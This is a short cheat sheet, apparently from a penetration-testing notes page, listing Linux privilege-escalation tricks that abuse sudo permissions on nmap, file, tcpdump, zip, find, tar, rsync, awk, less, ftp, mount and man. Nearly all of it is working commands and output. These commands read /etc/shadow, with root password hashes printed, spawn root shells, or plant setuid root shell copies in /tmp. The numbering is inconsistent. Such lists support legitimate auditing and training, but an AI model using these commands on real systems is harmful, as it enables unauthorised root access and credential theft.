You can find out which commands your user is allowed to run as root by calling "sudo -l".
Here are some examples:
1. SUDO NMAP
user@host:~$ sudo nmap -iL /etc/shadow 2>&1 | grep root Failed to resolve "root:$6$tacLae7v$blr1A8KS2WwHTLgttagiFMgGa94JEkKXVNXAm8a5Lg5vJrdowQTiycwML9M2ibBF6Vu4KZAHcOgOLuqrc6kdn0:16135:0:99999:7:::".(nmap < 5.35DC1 also has a “—interactive” switch which drops you to a shell where you can execute commands by using the “!cmd” syntax)
2. SUDO FILE
user@host:~$ sudo file -m /etc/shadow /etc/shadow, 1: Warning: offset `root:$6$5EZeAFXG$V.b3POklvJLNMt0cIEIQecW2Co6cKFUXmDR5bHVjWdsgTJq8URt6m7zBfNFNxdMEZHD7F4esGON.OED88HBPn1:16491:0:99999:7:::' invalid [... snip ...]
3. SUDO TCPDUMP
user@host:~$ echo -e "cp /bin/sh /tmp/sh_suid\nchmod 7555 /tmp/sh_suid" > tmpfile user@host:~$ chmod +x tmpfile user@host:~$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes Maximum file limit reached: 1 user@host:~$ ls -l /tmp/sh_suid -r-sr-sr-t 1 root root 117176 May 19 10:14 /tmp/sh_suid user@host:~$ /tmp/sh_suid # whoami root
4. SUDO ZIP
user@host:~$ touch somefile user@host:~$ sudo zip -q /tmp/test.zip somefile -T -TT '/bin/sh #' # id uid=0(root) gid=0(root) groups=0(root)
5. SUDO FIND
user@host:~$ sudo find /dev/null -exec sh \; # id uid=0(root) gid=0(root) groups=0(root)
6. SUDO TAR
user@host:~$ touch somefile user@host:~$ sudo tar cf /dev/null somefile --checkpoint=1 --checkpoint-action=exec=/bin/sh # id uid=0(root) gid=0(root) groups=0(root)
7. SUDO RSYNC
user@host:/tmp$ cat > somefile << EOF > cp /bin/sh /tmp/sh_root > chmod a+sx /tmp/sh_root > EOF user@host:/tmp$ sudo rsync -e 'sh /tmp/somefile' /dev/null 127.0.0.1:/dev/null 2>/dev/null user@host:/tmp$ /tmp/sh_root # whoami root
8. SUDO AWK
user@host:~$ sudo awk 'BEGIN {system("/usr/bin/id")}' uid=0(root) gid=0(root) groups=0(root)9. SUDO MORE/SUDO LESS
user@host:~$ sudo more /dev/zero [...] !bash root@host:~# id uid=0(root) gid=0(root) groups=0(root)10. SUDO (S)FTP
user@host:~$ sudo ftp ftp> !id uid=0(root) gid=0(root) groups=0(root) ftp>
11. SUDO MOUNT
user@host:~$ sudo mount -o bind /bin/bash /bin/mount user@host:~$ sudo mount root@host:~# id uid=0(root) gid=0(root) groups=0(root)
8. SUDO MAN
user@host:~$ sudo man -P id man uid=0(root) gid=0(root) groups=0(root)